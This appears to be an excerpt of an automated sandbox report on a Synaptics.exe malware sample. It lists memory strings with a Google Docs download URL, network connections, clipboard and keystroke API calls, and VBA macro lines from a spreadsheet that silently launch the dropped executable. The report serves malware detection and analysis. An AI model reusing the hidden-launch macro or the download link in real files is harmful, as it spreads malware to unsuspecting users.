                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX$/
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYNz
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYv
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_%
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_B
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaR
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadmo
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.tx
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.un
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrP
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadriveU
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrox
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadruste
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads://Zu
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsT
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadseL
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsion-?
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1p
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtRe
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtdx
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiP
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtn5m
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtubekJ%
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu%
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduble
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurH
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduri
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadusic.
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv$
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvices
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwC
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwNd
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwv
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyR
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo5Qv
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyodw
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoem
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadytics
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzQ
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz~
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59892
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59904 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59866 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59889 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59915 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 60042 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59829
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59943
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59942
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59944
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59831
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59830
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59944 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59958
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59957
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59959
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59956
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59840
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59841
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59829 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59903 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59969
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59847
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59968
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59914 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59844
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59967
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59966
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59853
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59933 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59956 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59925 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59967 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59855
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59854
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60043
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59860
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60042
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59968 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59903
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59902
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59904
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59901
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59868 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59902 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59818 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59914
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59913
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59915
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59913 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59912
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59934 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59853 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59880 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59924 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59925
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59819 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59924
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59892 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59923
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59922
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59847 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59819
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59818
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59841 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59937
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59934
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59933
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59820
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59941
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59830 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59957 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59901 -> 443
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DC7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00DC7099
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DC7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00DC7294
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_00947294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00947294
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DB4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_00DB4342

                                System Summary

                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
